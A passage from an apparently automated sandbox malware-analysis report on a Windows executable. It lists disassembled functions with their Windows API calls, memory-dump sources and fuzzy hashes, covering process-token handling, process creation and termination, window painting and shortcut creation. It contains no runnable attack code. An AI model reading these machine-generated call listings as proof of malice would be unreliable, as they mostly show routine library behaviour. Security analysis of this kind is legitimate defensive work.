                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$FileName$OpenSave
                                    • String ID: X
                                    • API String ID: 83654149-3081909835
                                    • Opcode ID: 5fe59f8ef31837d4c4f043b48f85cc89f72d4a00aa00529b0c00a09c0e8c68af
                                    • Instruction ID: 4865408771858d441af6907bcc206fae20007cabb6120698286b85dd6d0a66fc
                                    • Opcode Fuzzy Hash: 5fe59f8ef31837d4c4f043b48f85cc89f72d4a00aa00529b0c00a09c0e8c68af
                                    • Instruction Fuzzy Hash: 8BE19031508340DFC714EF24C485B6AB7E4BF85314F14896DEA899B3A2DB39DD05CB92
                                    Function 0079920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • BeginPaint.USER32(?,?,?), ref: 00799241
                                    • GetWindowRect.USER32(?,?), ref: 007992A5
                                    • ScreenToClient.USER32(?,?), ref: 007992C2
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007992D3
                                    • EndPaint.USER32(?,?,?,?,?), ref: 00799321
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007D71EA
                                      • Part of subcall function 00799339: BeginPath.GDI32(00000000), ref: 00799357
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 3050599898-0
                                    • Opcode ID: eb8644763b07ba35a5a997c043b7ee77cd92f61adb4abe39d4d9034a7dd82084
                                    • Instruction ID: 556829f5efc4f124e7bb6cda846bc49ff18024c848771aab0dd667c5390ab5ad
                                    • Opcode Fuzzy Hash: eb8644763b07ba35a5a997c043b7ee77cd92f61adb4abe39d4d9034a7dd82084
                                    • Instruction Fuzzy Hash: D1418E70104300AFEB21DF28D889FAA7BB8FF96321F14062DFA55872A1D7399845DB61
                                    Function 007F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007F080C
                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007F0847
                                    • EnterCriticalSection.KERNEL32(?), ref: 007F0863
                                    • LeaveCriticalSection.KERNEL32(?), ref: 007F08DC
                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007F08F3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F0921
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3368777196-0
                                    • Opcode ID: 3d1e2b3a1e6c00954d48f944169e00b13125695227cb71ffc03be1105c8c90f1
                                    • Instruction ID: f84495ec35bf395502262af37dcb079ec3ccbdd5d8c8c1d3800752f24fb0e3dd
                                    • Opcode Fuzzy Hash: 3d1e2b3a1e6c00954d48f944169e00b13125695227cb71ffc03be1105c8c90f1
                                    • Instruction Fuzzy Hash: 6A416D71900209EBDF14EF64DC85AAA7779FF04310F1480A9ED00DA297D734DE55DBA4
                                    Function 008181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,007DF3AB,00000000,?,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 0081824C
                                    • EnableWindow.USER32(00000000,00000000), ref: 00818272
                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008182D1
                                    • ShowWindow.USER32(00000000,00000004), ref: 008182E5
                                    • EnableWindow.USER32(00000000,00000001), ref: 0081830B
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0081832F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 2867db6b6dbb506b0497af30291541b9d2c8d50c98efa924a9571311ebd8e10a
                                    • Instruction ID: 7d4843bfd7a1503ec86797b320e2c485c65034cf9979fc420d9e174d68418cc2
                                    • Opcode Fuzzy Hash: 2867db6b6dbb506b0497af30291541b9d2c8d50c98efa924a9571311ebd8e10a
                                    • Instruction Fuzzy Hash: FD41C574601644EFDF22CF24C89ABE47BE9FF0A715F184169E518CB2A2CB71AC81CB50
                                    Function 007E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 007E4C95
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007E4CB2
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007E4CEA
                                    • _wcslen.LIBCMT ref: 007E4D08
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007E4D10
                                    • _wcsstr.LIBVCRUNTIME ref: 007E4D1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                    • String ID:
                                    • API String ID: 72514467-0
                                    • Opcode ID: 2b32e860ec27f52c4507748674d2bb3dd8b4de49af3aaa30ca1701840d803ad2
                                    • Instruction ID: aef843fefe4add484b2493a204f82134dcd8a83d6695defd50644ed33f563cb1
                                    • Opcode Fuzzy Hash: 2b32e860ec27f52c4507748674d2bb3dd8b4de49af3aaa30ca1701840d803ad2
                                    • Instruction Fuzzy Hash: 6A210B72305240BBEB159B3AEC49E7B7BACDF49750F10807DF905CB192EA69DC4196A0
                                    Function 007F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                    • _wcslen.LIBCMT ref: 007F587B
                                    • CoInitialize.OLE32(00000000), ref: 007F5995
                                    • CoCreateInstance.OLE32(0081FCF8,00000000,00000001,0081FB68,?), ref: 007F59AE
                                    • CoUninitialize.OLE32 ref: 007F59CC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 3172280962-24824748
                                    • Opcode ID: 89d70eb35f06add34e2b29c78e07a77051009c6c15f7027e94280ee1d0ce692a
                                    • Instruction ID: 3503cb9eee769958970ca5cb92dd972ec969b2f79da2a29f924c408807cba951
                                    • Opcode Fuzzy Hash: 89d70eb35f06add34e2b29c78e07a77051009c6c15f7027e94280ee1d0ce692a
                                    • Instruction Fuzzy Hash: 19D17471608605DFC718EF24C48492ABBE5FF89720F14885DFA8A9B361D739EC45CB92
                                    Function 007E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007E0FCA
                                      • Part of subcall function 007E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007E0FD6
                                      • Part of subcall function 007E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007E0FE5
                                      • Part of subcall function 007E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007E0FEC
                                      • Part of subcall function 007E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007E1002
                                    • GetLengthSid.ADVAPI32(?,00000000,007E1335), ref: 007E17AE
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007E17BA
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E17C1
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 007E17DA
                                    • GetProcessHeap.KERNEL32(00000000,00000000,007E1335), ref: 007E17EE
                                    • HeapFree.KERNEL32(00000000), ref: 007E17F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: ee76fd2363495920f5e98c98bcb0c7052b87c509afdc8d699f2d9fbf7cd3fcea
                                    • Instruction ID: 120f4978f2041391f28a91fcd14299b55cd2c4eecfd969059e338ebdb1293698
                                    • Opcode Fuzzy Hash: ee76fd2363495920f5e98c98bcb0c7052b87c509afdc8d699f2d9fbf7cd3fcea
                                    • Instruction Fuzzy Hash: 71117C31586605FFDB109FA5CC4ABAE7BA9FF49755F508018F481D7210D739A944CB60
                                    Function 007E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007E14FF
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 007E1506
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007E1515
                                    • CloseHandle.KERNEL32(00000004), ref: 007E1520
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007E154F
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 007E1563
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: 51f1606c400cd528eb2d62c97bb07aba6f7fd856fc22960253ba4fd7b2d66e24
                                    • Instruction ID: b4a108b8918042661b29804b40daea991d66c5a56121173c867433a6169cabfd
                                    • Opcode Fuzzy Hash: 51f1606c400cd528eb2d62c97bb07aba6f7fd856fc22960253ba4fd7b2d66e24
                                    • Instruction Fuzzy Hash: CB112972541249ABDF118F99ED4ABDE7BADFF49744F048015FA05A21A0C3758E60DB60
                                    Function 007A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,007A3379,007A2FE5), ref: 007A3390
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007A339E
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007A33B7
                                    • SetLastError.KERNEL32(00000000,?,007A3379,007A2FE5), ref: 007A3409
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 2d39ece88335c42a5e6ea25ab495fae9d22efabf01bc47fb7e1e010741623a53
                                    • Instruction ID: 8e9ac86b5d8c51369a17be6580f37865705d8cd993d16f62c27cc146e8621414
                                    • Opcode Fuzzy Hash: 2d39ece88335c42a5e6ea25ab495fae9d22efabf01bc47fb7e1e010741623a53
                                    • Instruction Fuzzy Hash: EC01473360E711FEAA642F747C896672A98FB873793200329F420842F0EF194D019544
                                    Function 007B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,007B5686,007C3CD6,?,00000000,?,007B5B6A,?,?,?,?,?,007AE6D1,?,00848A48), ref: 007B2D78
                                    • _free.LIBCMT ref: 007B2DAB
                                    • _free.LIBCMT ref: 007B2DD3
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,007AE6D1,?,00848A48,00000010,00784F4A,?,?,00000000,007C3CD6), ref: 007B2DE0
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,007AE6D1,?,00848A48,00000010,00784F4A,?,?,00000000,007C3CD6), ref: 007B2DEC
                                    • _abort.LIBCMT ref: 007B2DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: f56f56271d2b4901936d039be28887b5bade5aac5c8916a3d610b4336e46fad5
                                    • Instruction ID: 3adb75f0d09b3ae3d9dde2c55250335300b24cf4557b658494efbba594dd079b
                                    • Opcode Fuzzy Hash: f56f56271d2b4901936d039be28887b5bade5aac5c8916a3d610b4336e46fad5
                                    • Instruction Fuzzy Hash: 3FF0A435647600B7C6523738AC0EBDA2959BFC67A1B244518F824D22A7EE2C98434161
                                    Function 00818A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996A2
                                      • Part of subcall function 00799639: BeginPath.GDI32(?), ref: 007996B9
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996E2
                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00818A4E
                                    • LineTo.GDI32(?,00000003,00000000), ref: 00818A62
                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00818A70
                                    • LineTo.GDI32(?,00000000,00000003), ref: 00818A80
                                    • EndPath.GDI32(?), ref: 00818A90
                                    • StrokePath.GDI32(?), ref: 00818AA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: d1cba877b65e93c671590079250a7cc7496ce7c146d05b7839c79ed5e11f6ab5
                                    • Instruction ID: 5267d95a29fc3b52ad25ced387e0436af45c818341df214496a72cf2fbb94d3a
                                    • Opcode Fuzzy Hash: d1cba877b65e93c671590079250a7cc7496ce7c146d05b7839c79ed5e11f6ab5
                                    • Instruction Fuzzy Hash: 2411E576040118FFEF129F94DC88EEA7F6CFF08350F008012BA199A1A1C7719D559BA0
                                    Function 007E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 007E5218
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 007E5229
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E5230
                                    • ReleaseDC.USER32(00000000,00000000), ref: 007E5238
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007E524F
                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 007E5261
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 712e549609aceec8efc81ca8d5ab21f0f7d000f1951e5d5f3fe0aa30edad33b3
                                    • Instruction ID: fc02b53da11ef35fe007906f8d3fec6e643390f6a81dbd53e2633dd96188e52c
                                    • Opcode Fuzzy Hash: 712e549609aceec8efc81ca8d5ab21f0f7d000f1951e5d5f3fe0aa30edad33b3
                                    • Instruction Fuzzy Hash: AA014475A41718BBEB105BA69C49A9EBF7CFF48751F048065FA05A7281D6709900CB60
                                    Function 00781BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00781BF4
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00781BFC
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00781C07
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00781C12
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00781C1A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00781C22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: c80b7809455a1e28a9b71805129483661e6b3f00eea51d9f2d79ff478958fcd8
                                    • Instruction ID: eba186609f3e962120792898c12f74615f7dfeaa0bf19958d69fe6db23b940ac
                                    • Opcode Fuzzy Hash: c80b7809455a1e28a9b71805129483661e6b3f00eea51d9f2d79ff478958fcd8
                                    • Instruction Fuzzy Hash: 0D0167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                    Function 007EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007EEB30
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007EEB46
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 007EEB55
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB64
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB6E
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 81edfa42eaaf761ff44c0b7b1f0cb1b3904349aa807b6416ee7955c987a632cb
                                    • Instruction ID: a019250069e2e6142e2eccd2e31bb30ebb1a9c737acc278e2094e87afa350f01
                                    • Opcode Fuzzy Hash: 81edfa42eaaf761ff44c0b7b1f0cb1b3904349aa807b6416ee7955c987a632cb
                                    • Instruction Fuzzy Hash: 2CF03AB2681168BBE7215B62AC0EEEF7A7CFFCAB11F008159F611D1191E7A05A01C6B5
                                    Function 007D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?), ref: 007D7452
                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 007D7469
                                    • GetWindowDC.USER32(?), ref: 007D7475
                                    • GetPixel.GDI32(00000000,?,?), ref: 007D7484
                                    • ReleaseDC.USER32(?,00000000), ref: 007D7496
                                    • GetSysColor.USER32(00000005), ref: 007D74B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                    • String ID:
                                    • API String ID: 272304278-0
